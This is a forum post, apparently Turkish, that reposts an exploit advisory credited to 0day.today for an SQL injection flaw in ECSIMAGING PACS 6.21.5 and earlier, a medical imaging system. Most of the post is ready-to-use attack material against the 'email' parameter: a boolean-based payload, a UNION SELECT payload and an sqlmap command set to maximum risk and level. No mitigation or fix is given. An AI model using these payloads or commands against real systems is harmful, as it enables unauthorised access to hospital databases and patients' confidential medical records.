Hoşgeldin Misafir

ECSIMAGING PACS 6.21.5 - SQL injection Vulnerability

Asım Gürsoy

mersin
27 Mar 2020
8,833 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
ECSIMAGING PACS 6.21.5 - SQL injection Vulnerability--


Kod:
# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux
 
ECSIMAGING PACS Application in 6.21.5 and bellow suffers from  SQLinjection vulnerability
The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters )
 
Payload example : /[email protected]' OR NOT 9856=9856-- nBwf&selected_db=xtp001
/[email protected]'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001
 
SQLMAP :  sqlmap.py -u '<URL>/[email protected]&selected_db=xtp001' --risk=3 --level=5
 
#  0day.today [2021-01-10]  #